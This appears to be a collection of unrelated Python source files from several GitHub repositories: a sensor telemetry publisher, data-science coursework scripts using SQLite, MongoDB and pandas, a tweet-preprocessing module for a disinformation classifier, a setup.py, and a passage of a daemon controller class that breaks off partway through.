type=click.FloatRange(min=0, max=None), default=12.0, show_default=True, help="The rotations per minute for the tachometer.") @click.option("--tachometer-rotation-speed-variance", type=click.FloatRange(min=0, max=None), default=1.0, show_default=True, help="The variance of the rotations per minute for the tachometer.") @click.option("--piezo-enabled", is_flag=True, default=True, show_default=True, help="Whether or not to send piezoo sensor telemetry messages.") @click.option("--piezo-vibration-frequency", type=click.FloatRange(min=0.0, max=None), default=1000.0, show_default=True, help="The frequence (in Hz) of the vibrations for the piezo sensor.") @click.option("--piezo-vibration-frequency-variance", type=click.FloatRange(min=0.0, max=None), default=1.0, show_default=True, help="The variance (in Hz) of the vibrations for the piezo sensor.") @click.option("--verbose", is_flag=True, default=False, show_default=True, help="Enable verbose logging output") @click.argument("broker_url", required=True) def main(location_id, rig_id, broker_username, broker_password, telemetry_topic, telemetry_frequency, buffer_timeout, tachometer_enabled, tachometer_rotation_speed, tachometer_rotation_speed_variance, piezo_enabled, piezo_vibration_frequency, piezo_vibration_frequency_variance, verbose, broker_url): broker_url_parts = urlparse(broker_url) broker_auth = { "username": broker_username, "password": <PASSWORD> } last_run = now() msgs = list() while True: current_run = now() if verbose: click.echo("Woke up. Gathering telemetry data...") click.echo("Last run: {}, Current Run: {}".format(last_run, current_run)) msg = __msg(telemetry_topic, json.dumps(__heartbeat(location_id, rig_id, current_run))) if verbose: click.echo(msg) msgs.append(msg) if tachometer_enabled: msg = __msg(telemetry_topic, json.dumps(__tachometer(location_id, rig_id, current_run, tachometer_rotation_speed, tachometer_rotation_speed_variance))) if verbose: click.echo(msg) msgs.append(msg) if piezo_enabled: msg = __msg(telemetry_topic, json.dumps(__piezo(location_id, rig_id, current_run, piezo_vibration_frequency, piezo_vibration_frequency_variance))) if verbose: click.echo(msg) msgs.append(msg) if current_run >= (last_run + buffer_timeout): click.echo("Publishing {} messages to {}:{}...".format(len(msgs), broker_url_parts.hostname, broker_url_parts.port)) publish.multiple(msgs, hostname=broker_url_parts.hostname, port=broker_url_parts.port, auth=broker_auth, client_id="{}-{}".format(location_id, rig_id)) click.echo("Done.") last_run = now() msgs.clear() time.sleep(telemetry_frequency) if __name__ == "__main__": main() ```
{ "source": "joshdsolis/DS-Unit-3-Sprint-1-Software-Engineering", "score": 4 }
#### File: joshdsolis/DS-Unit-3-Sprint-1-Software-Engineering/acme.py ```python import random class Product: """Class for Acme's Product""" def __init__(self, name, price = 10, weight = 20, flammability = 0.5, identifier = random.randint(1000000,9999999)): self.name = name self.price = price self.weight = weight self.flammability = flammability self.identifier = identifier def stealability(self): ratio = self.price/float(self.weight) if ratio < 0.5: return "Not so stealable..." elif ratio >= 0.5 and ratio < 1: return "Kinda stealable." else: return "Very stealable!" def explode(self): final = self.flammability * self.weight if final < 10: return "...fizzle" elif final >= 10 and final < 50: return "...boom!" else: return "...BABOOM!!" class BoxingGlove(Product): def __init__(self, name, price = 10, weight = 10, flammability = 0.5, identifier = random.randint(1000000,9999999)): self.name = name self.price = price self.weight = weight self.flammability = flammability self.identifier = identifier def explode(self): return "...it's a glove" def punch(self): if self.weight < 5: return "That tickles" elif self.weight >= 5 and self.weight < 15: return "Hey that hurt!" else: return "OUCH!" ```
{ "source": "joshdsolis/DS-Unit-3-Sprint-2-SQL-and-Databases", "score": 4 }
#### File: joshdsolis/DS-Unit-3-Sprint-2-SQL-and-Databases/demo_data.py ```python import sqlite3 sl_conn = sqlite3.connect('../SQLandDatabases/demo_data.sqlite3') create_table = """ CREATE TABLE demo ( s varchar(30), x int, y int ); """ sl_curs = sl_conn.cursor() sl_curs.execute(create_table) sl_curs.execute(""" INSERT INTO demo ( s, x, y) VALUES ("'g'", 3, 9) ;""") sl_curs.execute(""" INSERT INTO demo ( s, x, y) VALUES ("'v'", 5, 7) ;""") sl_curs.execute(""" INSERT INTO demo ( s, x, y) VALUES ("'f'", 8, 7) ;""") sl_conn.commit() rows_count_query = """SELECT COUNT(*) FROM demo;""" greater_than_5_query = """SELECT COUNT(*) FROM demo WHERE demo.x >= 5 AND demo.y >= 5;""" unique_y_query = """SELECT COUNT(DISTINCT(demo.y)) FROM demo;""" def query(x): print(sl_curs.execute(x).fetchall()) ``` #### File: DS-Unit-3-Sprint-2-SQL-and-Databases/module3-nosql-and-document-oriented-databases/rpg_to_mongo.py ```python import sqlite3 import pymongo # Get the data from sqlite3 sl_conn = sqlite3.connect('../joshdsolis/rpg_db.sqlite3') results = sl_conn.execute('SELECT * FROM charactercreator_character;').fetchall() # Data to dict form def dict_factory(cursor, row): d = {} for idx, col in enumerate(cursor.description): d[col[0]] = row[idx] return d sl_conn.row_factory = dict_factory curs = sl_conn.cursor() curs.execute results = sl_conn.execute('SELECT * FROM charactercreator_character;').fetchall() # Connecting to MongoDB connection_string = "mongodb://UserJosh:<TODO>@cluster0-shard-00-00-5wkdx.mongodb.net:27017,cluster0-shard-00-01-5wkdx.mongodb.net:27017,cluster0-shard-00-02-5wkdx.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true" client = pymongo.MongoClient(connection_string) db = client.test for result in results: db.test.insert_one(result) print(list(db.test.find())) ```
{ "source": "joshdsolis/lambdata", "score": 3 }
#### File: lambdata/lambdata_joshdsolis/lambdata_tests.py ```python import unittest import numpy as np import pandas as pd from __init__ import * # testing __init__ functions class LambTest(unittest.TestCase): """Test lambdata_joshdsolis functions""" # def test_checknulls(self): # df = pd.DataFrame(np.ones(100)) # self.assertEqual(check_nulls(df).tolist(), df.isna().sum()).tolist() # Testing more_rows functions in init def test_morerows(self): df = pd.DataFrame(np.ones(100)) more_rows(df, 100) self.assertEqual(df.shape, (200, 1)) if __name__ == '__main__': unittest.main() ```
{ "source": "joshduf/DisinformationNetworks", "score": 3 }
#### File: joshduf/DisinformationNetworks/preProcess.py ```python import csv import numpy as np import random import re # Non-ASCII values are ignored to ensure the model doesn't # use artifacts from the encoding process to classify tweets # as I have no control over the methods NBCNews used to create # it's csv of positive examples. # Only time and tweet text are used and are tagged def getFile(file, MAX): STWEET = "<SW>" ETWEET = "<EW>" SHOUR = "<SH>" EHOUR = "<EH>" STEXT = "<ST>" ETEXT = "<ET>" lines = [] with open(file, "r", encoding="utf-8") as f: data = csv.reader(f) for _, row in zip(range(MAX), data): time = row[1].encode('ascii',errors='ignore').decode() text = row[2].encode('ascii',errors='ignore').decode() lines.append(STWEET + SHOUR + time + EHOUR + STEXT + text + ETEXT + ETWEET) f.close() return lines # To be fed into a CNN, all examples are padded to the length of the # longest example def pad(data): longest = len(max(data, key=len)) padded = [row.ljust(longest, ">") for row in data] return padded # Tweets are grouped together. This assumes they were organized by # user first, then time. The dataset used had on average hundreds # of tweets per user and the group size was <= 20 so the possibility # of a group consisting of tweets from 2 different users don't # significantly effect the outcome of classification and are ignored. def combine(data, GROUPSIZE): START = "<S>" END = "<E>" newData = [] for newRow in range(len(data)//GROUPSIZE): combined = "" for oldRow in range(newRow*GROUPSIZE, (newRow + 1)*GROUPSIZE): combined += data[oldRow] + " " combined = START + " " + combined + END newData.append(combined) return newData # Takes positive and negative examples and creates input and output vectors def readData(POSFILE, NEGFILE, NEGFILE2, MAXPOS, MAXNEG, MAXNEG2, GROUP): pos = getFile(file=POSFILE, MAX=MAXPOS) neg = getFile(file=NEGFILE, MAX=MAXNEG) + getFile(file=NEGFILE2, MAX=MAXNEG2) pos = combine(pos, GROUP) neg = combine(neg, GROUP) y = [1 for line in pos] + [0 for line in neg] x = pad(pos + neg) return (x, y) # Creates a dictionary mapping characters to an associated index def getIndexes(x): letters = set() for line in x: letters.update(line) indexes = dict((letter, index) for index, letter in enumerate(letters)) return indexes # Turns character vector into vector of character indexes def vectorize(x, y, indexes): Y = np.array(y) X = [[indexes.get(letter, -1) for letter in line] for line in x] return (X, Y) # Splits data into test and train sections def splitData(X, Y, SPLITSIZE): x_train = np.array(X[:SPLITSIZE]) x_test = np.array(X[SPLITSIZE:]) y_train = np.array(Y[:SPLITSIZE]) y_test = np.array(Y[SPLITSIZE:]) return (x_train, y_train), (x_test, y_test) ```
{ "source": "joshdunnlime/better-python-string-sql", "score": 4 }
#### File: better-python-string-sql/docs/demo.py ```python import sqlite3 DATASET = [ ("Tencho", "2018-12-03"), ("Bessho", "2018-12-03"), ("Emoto", "2020-12-03"), ("Gamo", "2020-12-03"), ("Funakoshi", "2020-12-03"), ("Funakoshi", "2020-12-03"), ("Doigaki", "2020-12-03"), ("Doigaki", "2020-20-03"), ("Chikura", "2020-12-03"), ("Akabane", "2020-12-03"), ] def main(): conn = sqlite3.connect(":memory:") conn.executescript( """ DROP TABLE IF EXISTS foobar; CREATE TABLE foobar ( last_name TEXT TEXT NOT NULL, start_day TEXT NOT NULL ); """ ) conn.executemany("INSERT INTO foobar VALUES (?, ?)", DATASET) query = """ SELECT last_name, start_day, COUNT(*) AS num_entries FROM foobar WHERE start_day >= '2019-01-01' GROUP BY last_name, start_day ORDER BY num_entries DESC LIMIT 10; """ print(conn.execute(query).fetchall()) if __name__ == "__main__": main() ```
{ "source": "joshedler/ct2ad", "score": 4 }
#### File: joshedler/ct2ad/ct2ad.py ```python def sql_get_tables(con): ''' Print the tables found in the SQLite database. :param con: sqlite3 connection object :return: returns nothing ''' c = con.cursor() c.execute('SELECT name from sqlite_master where type= "table"') print('found tables:') print(f' {c.fetchall()}') def sql_get_all_nodes(con): ''' Get all nodes from the CherryTree database. :param con: sqlite3 connection object :return: returns a dictionary, with keys being node_id and values being the original tuple row from the database (node_id, name, txt) ''' c = con.cursor() c.execute('SELECT node_id, name, txt from node') # 'rows' are of type list # each 'row' is of type tuple rows = c.fetchall() print(f'loaded {len(rows)} total nodes...') results = { } for row in rows: results[row[0]] = row return results def sql_get_all_children(con): ''' Get all children from the CherryTree database. :param con: sqlite3 connection object :return: returns the children as a list of tuple(node_id, father_id, sequence) ''' c = con.cursor() c.execute('SELECT node_id, father_id, sequence from children') # 'rows' are of type list # each 'row' is of type tuple rows = c.fetchall() print(f'loaded {len(rows)} total children...') return rows def sql_get_child_by_node_id(con, node_id): ''' Get the node with matching node_id from the CherryTree database. :param con: sqlite3 connection object :param node_id: the node_id to return :return: returns a list of tuple rows from the database (node_id, name, txt) ''' c = con.cursor() a = (node_id,) c.execute('SELECT node_id, father_id, sequence FROM children WHERE node_id = ?', a) # 'rows' are of type list # each 'row' is of type tuple rows = c.fetchall() return rows def expand_child(child, all_nodes): ''' Given a child tuple, return the matching node_id as a dictionary. :param child: a child tuple(node_id, father_id, sequence) :param all_nodes: the dictionary of all nodes from the database :return: returns a node as a dictionary object with keys 'node' as tuple (node_id, name, txt), 'father' as tuple (node_id, name, txt), and 'seq' as integer ''' node = all_nodes[child[0]] father = all_nodes[child[1]] if child[1] > 0 else None seq = child[2] return {'node': node, 'father': father, 'seq': seq} def get_father_for_node(node, all_children, all_nodes): ''' Find the father for a given node. :param node: the starting node for which the father is desired :param all_children: the list of all children from the database :param all_nodes: the dictionary of all nodes from the database :return: returns the father node (node_id, name, txt) if there is one or None ''' node_id = get_node_id(node) for c in all_children: if c[0] == node_id: xc = expand_child(c, all_nodes) return get_expanded_child_father(xc) return None def get_expanded_child_node(xc): return xc['node'] def get_expanded_child_father(xc): return xc['father'] def get_expanded_child_seq(xc): return xc['seq'] def get_node_txt(node): ''' Returns the txt field from a node tuple (node_id, name, txt) :param node: a node tuple (node_id, name, txt) :return: returns the string representing the txt field ''' return node[2] def get_node_name(node): ''' Returns the name field from a node tuple (node_id, name, txt) :param node: a node tuple (node_id, name, txt) :return: returns the string representing the name field ''' return node[1] def get_node_id(node): ''' Returns the node_id field from a node tuple (node_id, name, txt) :param node: a node tuple (node_id, name, txt) :return: returns the node_id field ''' return node[0] def dig(father, all_children, all_nodes, level): ''' Given a father, recursively dig through the children, yielding(expanded_child_node, level) along the way. :param father: a father as an "expanded child" dictionary node with keys 'node', 'father', and 'seq' :param all_children: the list of all children from the database :param all_nodes: the dictionary of all nodes from the database :level: an integer, beginning with 1, representing the indent level for nice output :return: returns nothing ''' father_id = father['node'][0] children = list(filter(lambda c: c[1] == father_id, all_children)) xc_list = [] for child in children: xc = expand_child(child, all_nodes) xc_list.append(xc) for xc in sorted(xc_list, key=sequence_order): yield(xc, level) for xc_n, l in dig(xc, all_children, all_nodes, level+1): yield(xc_n, l) def sequence_order(expanded_child): ''' A function allowing sorted() to iterate over a list of expanded_child dictionary objects in the proper sequence. ''' return expanded_child['seq'] ``` #### File: joshedler/ct2ad/tree.py ```python import argparse import colorama from colorama import Fore, Back, Style import sqlite3 from ct2ad import * def print_xc_node(xc_node, level): ''' Print the node information to the console in a nice format ''' indent = '--' * level s = get_expanded_child_seq(xc_node) n = get_expanded_child_node(xc_node) print(f'{Style.DIM}|{indent} {Style.NORMAL}{s:03}: {Style.BRIGHT+Fore.YELLOW}\'{get_node_name(n)}\' {Fore.RESET}{Style.DIM}: [node_id = {get_node_id(n)}]') # setup argument parsing... parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('sqlite3_db', action='store') args = parser.parse_args() colorama.init(autoreset=True) # load the database and party on! con = sqlite3.connect(args.sqlite3_db) sql_get_tables(con) # all_nodes are a dict with each key being the unique node_id all_nodes = sql_get_all_nodes(con) # all_children are a list of tuples all_children = sql_get_all_children(con) xc_roots = [] for child in all_children: xc_root = expand_child(child, all_nodes) if get_expanded_child_father(xc_root) == None: xc_roots.append(xc_root) print() count = 0 for xc_root in sorted(xc_roots, key=sequence_order): count = count + 1 print_xc_node(xc_root, 0) for xc, level in dig(xc_root, all_children, all_nodes, 1): print_xc_node(xc, level) count = count + 1 print(f'\n{count} nodes iterated over') ```
{ "source": "JoshEHenderson/Convolution-Basics-Numpy", "score": 4 }
#### File: JoshEHenderson/Convolution-Basics-Numpy/Convolution_Basics.py ```python import sys #system import import numpy as np #for handling arrays import matplotlib.pyplot as plt #for plotting images import matplotlib.image as mpimg #for reading images DIR = #Enter file location of image to be processed here def pad(img, num): #adds layers of zeros so that filter can detect border features w = img.shape[0] #image width h = img.shape[1] #image height output = np.zeros((w+num*2, h+num*2)) #output array, initialized to zeros for r in range(h+2): for c in range(w+2): if r<num or c<num or r>h+num-1 or c>w+num-1: output[c,r] = 0 #add a zero to the first num and last num rows/columns else: output[c,r] = img[c-num,r-num] #everything else is the same return output def ReLU(img): #helps with image output - turns negative numbers into zeros w = img.shape[0] #image width h = img.shape[1] #image height output = np.zeros((w, h)) #output array, initialized to zeros for r in range(h): for c in range(w): output[c,r]= max(img[c,r], 0) #max between current value and 0 (0>negative number) return output def maxPool(img, sz=2, str=2): #max pooling function for downsizing; sz = window size; str = stride w = img.shape[0] #image width h = img.shape[1] #image height output = np.zeros((int((w-sz+1)/str), int((h-sz+1)/str))) #output array, initialized to zeros if output.shape[0] < 1: #make sure we're not going to get rid of the image print("image is not big enough to pool with given pool size and stride") return img outR = 0 #for keeping track of row on output for r in np.arange(0, h-sz-1, str): #rows from 0 to h-sz-1 with increments of str outC = 0 #for keeping track of column on output for c in np.arange(0, w-sz-1, str): #columns from 0 to w-sz-1 with increments of str output[outC, outR] = np.max(img[c:c+sz, r:r+sz]) #maximum from the current window outC += 1 outR += 1 return output def invertImg(img): for r in range(img.shape[1]): #moving down the image for c in range(img.shape[0]): #moving across the image img[c,r] = 1-img[c,r] #swap the large and small values (all are in range [0-1]) return img def convolution(img, filt, s=1): #convolution function (feature detection) img = pad(img, int((filt.shape[1]-1)/2)) #pad the image with the above pad function w = img.shape[0] #image width h = img.shape[1] #image height numFilts = filt.shape[0] #number of filters we are given filtDim = filt.shape[1] #dimensions of the filters output = np.zeros((w-int((filtDim-1)/2), h-int((filtDim-1)/2))) #output array init to zeros #Prerequisites for the convolution function to work correctly if(filt.shape[1] != filt.shape[2]): #filter width and height must be the same print("Width and height of filter aren't equal") sys.exit() if(filtDim%2==0): #there is no center pixel in the filter if it does not have odd dimensions print("Filter must have odd dimensions") sys.exit() for f in range(numFilts): #for each of the filters currF = filt[f, :] #get the current filter for r in range(h-filtDim-1): #move the filter vertically down the image for c in range(w-filtDim-1): #move the filter horizontally across the image output[c,r] = np.sum(img[c:c+filtDim, r:r+filtDim]*currF[:,:]) + output[c,r] '''For the above line: img[c:c+filtDim, r:r+filtDim]*currF[:,:] multiplies the current filter with the image area and then np.sum sums up the resulting array. Since there could be more than one filter, we add up the values from all the filters to get the combined result. ''' return output def doConv(img, imgNum, filtMd, filtLg): #different iterations of the program if(imgNum-1 in range(4)): print("Using function number",imgNum) else: print("Function number not defined") sys.exit() if(imgNum == 1): #Image 1 Start print("convolution layer 1") for j in range(2): #2 convolutions with large filters print("Large running") img = convolution(img, filtLg) for j in range(2): #2 convolutions with medium filters print("Medium running") img = convolution(img, filtMd) print("Pooling") img = maxPool(img) #Max pool print("ReLU") img = ReLU(img) #ReLU print("convolution layer 2") for j in range(2): #2 convolutions with large filters print("Large running") img = convolution(img, filtLg) for j in range(2): #2 convolutions with medium filters print("Medium running") img = convolution(img, filtMd) print("Single Convolution - Large") img = convolution(img, filtLg) #1 convolution with large filters print("Pooling") img = maxPool(img) #Max pool print("ReLU") img = ReLU(img) #ReLU #End Image 1 elif(imgNum == 2): #Image 2 Start for i in range(3): #3x loop Start print("convolution layer", i+1) print("Large running") img = convolution(img, filtLg) #1 convolution with large filters print("Medium running") img = convolution(img, filtMd) #1 convolution with medium filters print("Pooling") img = maxPool(img) #Max pool #End 3x loop for i in range(2): #2x loop Start print("convolution layer", i+4) print("Large running") img = convolution(img, filtLg) #1 convolution with large filters print("Medium running") img = convolution(img, filtMd) #1 convolution with medium filters print("Pooling") img = maxPool(img) #Max pool #End 2x Loop #End Image 2 elif(imgNum == 3): #Image 3 Start img = invertImg(img) #re-invert image because of the output of one layer diagonals = np.zeros((2, 5, 5)) #new array for filters for diagonals diagonals[0, :, :] = np.array([[[ 1, .25, -1, -1, -1], [.25, 1, .25, -1, -1], [ -1, .25, 1, .25, -1], [ -1, -1, .25, 1, .25], [ -1, -1, -1, .25, 1]]]) for y in range(5): for x in range(5): diagonals[1, x, y] = diagonals[0, y, 4-x] print("Single Convolution - Large") img = convolution(img, diagonals) #1 convolution with large filters #End Image 3 elif(imgNum == 4): #Image 4 Start for i in range(2): #2x Loop Start print("convolution layer",i+1) for j in range(2): #2 convolutions with large filters print("Large running") img = convolution(img, filtLg) for j in range(2): #2 convolutions with medium filters print("Medium running") img = convolution(img, filtMd) print("Pooling") img = maxPool(img) #Max pool #End 2x Loop print("ReLU") img = ReLU(img) #ReLU print("convolution layer 3") for j in range(2): #2 convolutions with large filters print("Large running") img = convolution(img, filtLg) for j in range(2): #2 convolutions with medium filters print("Medium running") img = convolution(img, filtMd) print("Pooling") img = maxPool(img) #Max pool print("Single Convolution - Large") img = convolution(img, filtLg) #1 convolution with large filters print("Pooling") img = maxPool(img) #Max pool print("ReLU") img = ReLU(img) #ReLU return img def setFilt(size): if(size == "Md"): filt = np.zeros((4, 3, 3)) #array for the medium filters (straight lines) filt[0, :,:] = np.array([[[ -1, .25, 1], #vertical line [ -1, .25, 1], [ -1, .25, 1]]]) filt[1,:,:] = np.array([[[ 1, 1, 1], #horizontal line [.25, .25, .25], [ -1, -1, -1]]]) filt[2,:,:] = np.array([[[ 1, .25, -1], #diagonal line (negative slope) [.25, 1, .25], [ -1, .25, 1]]]) filt[3,:,:] = np.array([[[ -1, .25, 1], #diagonal line (positive slope) [.25, 1, .25], [ 1, .25, -1]]]) elif(size == "Lg"): filt = np.zeros((6, 5, 5)) #array for large filters (curves and long diagonals) filt[0, :, :] = np.array([[[ 1, .25, -1, -1, -1], #long diagonal line (negative slope) [.25, 1, .25, -1, -1], [ -1, .25, 1, .25, -1], [ -1, -1, .25, 1, .25], [ -1, -1, -1, .25, 1]]]) for y in range(5): for x in range(5): filt[1, x, y] = filt[0, y, 4-x] #long diagonal line (positive slope) filt[2, :, :] = np.array([[[ 1, 1, .25, .10, -1], #curve (from top, right then down) [.25, .25, 1, .25, .10], [.10, .10, .25, 1, .25], [ -1, .05, .10, .25, 1], [ -1, -1, .10, .25, 1]]]) for y in range(5): for x in range(5): filt[3, x, y] = filt[2, y, 4-x] #curve (from bottom, up then right) for y in range(5): for x in range(5): filt[4, x, y] = filt[2, 4-y, x] #curve (from bottom, right then up) for y in range(5): for x in range(5): filt[5, x, y] = filt[4, 4-y, x] #curve (from top, down then right) else: print("Filter Size not Defined") sys.exit() return filt def comparisonPlot(img, n1, n2, n3, n4): #plots a side-by-side of four different outputs fig, axarr = plt.subplots(2, 2) #2x2 array of images to be displayed img1 = img2 = img3 = img4 = img #avoid interference between algorithms axarr[0, 0].imshow(doConv(img1, n1, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 1 axarr[0, 0].set_title('Image 1') #label image 1 axarr[0, 1].imshow(doConv(img2, n2, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 2 axarr[0, 1].set_title('Image 2') #label image 2 axarr[1, 0].imshow(doConv(img3, n3, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 3 axarr[1, 0].set_title('Image 3') #label image 3 axarr[1, 1].imshow(doConv(img4, n4, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 4 axarr[1, 1].set_title('Image 4') #label image 4 fig.subplots_adjust(hspace=0.5) #adjust the space beteen the images plt.show() #display the images def main(): #master function to manage subfunctions above, read, and write #read in the original image originalImg = mpimg.imread(DIR) plt.imshow(originalImg) #plots the original image img = originalImg[:, :, 0] #gets one layer of the image since it is black and white img = invertImg(img) #inverts image so black is large numbers and white is small numbers img = doConv(img, 1, setFilt("Md"), setFilt("Lg")) #does the pre-defined functions #currently in range [1,4] plt.imshow(img, "gist_heat") #plots the feature-detection image with red filter comparisonPlot(img, 1, 2, 3, 4) #side-by-side comparison of four images with red filter main() #runs the main function ```
{ "source": "JoshEHenderson/SQL-ETL-Visualization", "score": 3 }
#### File: JoshEHenderson/SQL-ETL-Visualization/SQL_Data_Visualization.py ```python import pandas as pd import matplotlib.pyplot as plt import datetime as dt # roundMin is passed a date with type datetime # roundMin returns the date rounded down to the minute (sets the value of date.second to 0) def roundMin(date): return dt.datetime(date.year, date.month, date.day, date.hour, date.minute, 0) dw_df = pd.read_csv("dw_df.csv") # read in data from file 'dw_df.csv' on the current working directory dw_df = dw_df.drop(['Unnamed: 0'], axis = 1) # drop the index column created by the writing to a csv # when stored and read, datetime gets converted to an object, so put back into datetime format dw_df['creationDate'] = pd.to_datetime(dw_df['creationDate']) # round creation date down to the nearest minute to make graphs more readable dw_df['creationDate'] = [roundMin(dw_df['creationDate'][i]) for i in range( len(dw_df) )] # ################## # Analyze # ################## study3_df = dw_df[dw_df.studyID == 3] # create a new dataframe with only survey 3 data plt.hist(study3_df['response'], range(1, 8)) # plot the responses in a histogram plt.title('Responses Over All Factors') # title the histogram plt.show() # display the histogram for fact in set(study3_df['factorName']): # loop through the factors present # create a new dataframe to work with that stores creationDate along with average response # average responses are grouped by minutes since we rounded to the nearest minute earlier curr_df = study3_df[study3_df.factorName == fact].groupby(['creationDate'], as_index = False).agg({'response':'mean'}) plt.plot(curr_df['creationDate'], curr_df['response'] ) # plot the average responses by creationDate plt.title(fact) # title the graph with the current factor plt.show() # display plot ```
{ "source": "joshehlinger/bandoleers", "score": 2 }
#### File: joshehlinger/bandoleers/setup.py ```python import os.path import setuptools import bandoleers def read_requirements(name): requirements = [] try: with open(os.path.join('requires', name)) as req_file: for line in req_file: if '#' in line: line = line[:line.index('#')] line = line.strip() if line.startswith('-r'): requirements.extend(read_requirements(line[2:].strip())) elif line and not line.startswith('-'): requirements.append(line) except IOError: pass return requirements setuptools.setup( name='bandoleers', description='AWeber development tool belt', long_description='\n'+open('README.rst').read(), version=bandoleers.__version__, packages=setuptools.find_packages(exclude=['tests', 'tests.*']), license='BSD', url='https://github.com/aweber/bandoleers', author='<NAME> <EMAIL>, <EMAIL>.', author_email='<EMAIL>', install_requires=read_requirements('installation.txt'), tests_require=read_requirements('testing.txt'), entry_points={ 'console_scripts': [ 'prep-it=bandoleers.prepit:run', 'wait-for=bandoleers.waitfor:run', ], }, classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', ], ) ```
{ "source": "joshehlinger/helper", "score": 3 }
#### File: helper/helper/controller.py ```python import logging import logging.config import os import multiprocessing import platform try: import queue except ImportError: import Queue as queue import signal import sys import time from helper import config, __version__ LOGGER = logging.getLogger(__name__) class Controller(object): """Extend this class to implement your core application controller. Key methods to implement are Controller.setup, Controller.process and Controller.cleanup. If you do not want to use the sleep/wake structure but rather something like a blocking IOLoop, overwrite the Controller.run method. """ APPNAME = sys.argv[0].split(os.sep)[-1] VERSION = __version__ #: When shutting down, how long should sleeping block the interpreter while #: waiting for the state to indicate the class is no longer active. SLEEP_UNIT = 0.5 #: How often should :meth:`Controller.process` be invoked WAKE_INTERVAL = 60 #: Initializing state is only set during initial object creation STATE_INITIALIZING = 0x01 #: When helper has set the signal timer and is paused, it will be in the #: sleeping state. STATE_SLEEPING = 0x02 #: The idle state is available to implementing classes to indicate that #: while they are not actively performing tasks, they are not sleeping. #: Objects in the idle state can be shutdown immediately. STATE_IDLE = 0x03 #: The active state should be set whenever the implementing class is #: performing a task that can not be interrupted. STATE_ACTIVE = 0x04 #: The stop requested state is set when a signal is received indicating the #: process should stop. The app will invoke the :meth:`Controller.stop` #: method which will wait for the process state to change from STATE_ACTIVE STATE_STOP_REQUESTED = 0x05 #: Once the application has started to shutdown, it will set the state to #: stopping and then invoke the :meth:`Controller.stopping` method. STATE_STOPPING = 0x06 #: Once the application has fully stopped, the state is set to stopped. STATE_STOPPED = 0x07 # For reverse lookup _STATES = {0x00: 'None', 0x01: 'Initializing', 0x02: 'Sleeping', 0x03: 'Idle', 0x04: 'Active', 0x05: 'Stop Requested', 0x06: 'Stopping', 0x07: 'Stopped'} # Default state _state = 0x00 def __init__(self, args, operating_system): """Create an instance of the controller passing in the debug flag, the options and arguments from the cli parser. :param argparse.Namespace args: Command line arguments :param str operating_system: Operating system name from helper.platform """ self.set_state(self.STATE_INITIALIZING) self.args = args try: self.config = config.Config(args.config) except ValueError: sys.exit(1) self.debug = args.foreground logging.config.dictConfig(self.config.logging) self.operating_system = operating_system self.pending_signals = multiprocessing.Queue() @property def current_state(self): """Property method that return the string description of the runtime state. :rtype: str """ return self._STATES[self._state] @property def is_active(self): """Property method that returns a bool specifying if the process is currently active. :rtype: bool """ return self._state == self.STATE_ACTIVE @property def is_idle(self): """Property method that returns a bool specifying if the process is currently idle. :rtype: bool """ return self._state == self.STATE_IDLE @property def is_initializing(self): """Property method that returns a bool specifying if the process is currently initializing. :rtype: bool """ return self._state == self.STATE_INITIALIZING @property def is_running(self): """Property method that returns a bool specifying if the process is currently running. This will return true if the state is active, idle or initializing. :rtype: bool """ return self._state in [self.STATE_ACTIVE, self.STATE_IDLE, self.STATE_INITIALIZING] @property def is_sleeping(self): """Property method that returns a bool specifying if the process is currently sleeping. :rtype: bool """ return self._state == self.STATE_SLEEPING @property def is_stopped(self): """Property method that returns a bool specifying if the process is stopped. :rtype: bool """ return self._state == self.STATE_STOPPED @property def is_stopping(self): """Property method that returns a bool specifying if the process is stopping. :rtype: bool """ return self._state == self.STATE_STOPPING @property def is_waiting_to_stop(self): """Property method that returns a bool specifying if the process is waiting for the current process to finish so it can stop. :rtype: bool """ return self._state == self.STATE_STOP_REQUESTED def on_configuration_reloaded(self): """Override to provide any steps when the configuration is reloaded.""" LOGGER.debug('%s.on_configuration_reloaded() NotImplemented', self.__class__.__name__) def on_shutdown(self): """Override this method to cleanly shutdown the application.""" LOGGER.debug('%s.cleanup() NotImplemented', self.__class__.__name__) def on_sigusr1(self): """Called when SIGUSR1 is received, does not have any attached behavior. Override to implement a behavior for this signal. """ LOGGER.debug('%s.on_sigusr1() NotImplemented', self.__class__.__name__) def on_sigusr2(self): """Called when SIGUSR2 is received, does not have any attached behavior. Override to implement a behavior for this signal. """ LOGGER.debug('%s.on_sigusr2() NotImplemented', self.__class__.__name__) def process(self): """To be implemented by the extending class. Is called after every sleep interval in the main application loop. """ raise NotImplementedError def process_signal(self, signum): """Invoked whenever a signal is added to the stack. :param int signum: The signal that was added """ if signum == signal.SIGTERM: LOGGER.info('Received SIGTERM, initiating shutdown') self.stop() elif signum == signal.SIGHUP: LOGGER.info('Received SIGHUP') if self.config.reload(): LOGGER.info('Configuration reloaded') logging.config.dictConfig(self.config.logging) self.on_configuration_reloaded() elif signum == signal.SIGUSR1: self.on_sigusr1() elif signum == signal.SIGUSR2: self.on_sigusr2() def run(self): """The core method for starting the application. Will setup logging, toggle the runtime state flag, block on loop, then call shutdown. Redefine this method if you intend to use an IO Loop or some other long running process. """ LOGGER.info('%s v%s started', self.APPNAME, self.VERSION) self.setup() while not any([self.is_stopping, self.is_stopped]): self.set_state(self.STATE_SLEEPING) try: signum = self.pending_signals.get(True, self.wake_interval) except queue.Empty: pass else: self.process_signal(signum) if any([self.is_stopping, self.is_stopped]): break self.set_state(self.STATE_ACTIVE) self.process() def start(self): """Important: Do not extend this method, rather redefine Controller.run """ for signum in [signal.SIGHUP, signal.SIGTERM, signal.SIGUSR1, signal.SIGUSR2]: signal.signal(signum, self._on_signal) self.run() def set_state(self, state): """Set the runtime state of the Controller. Use the internal constants to ensure proper state values: - :attr:`Controller.STATE_INITIALIZING` - 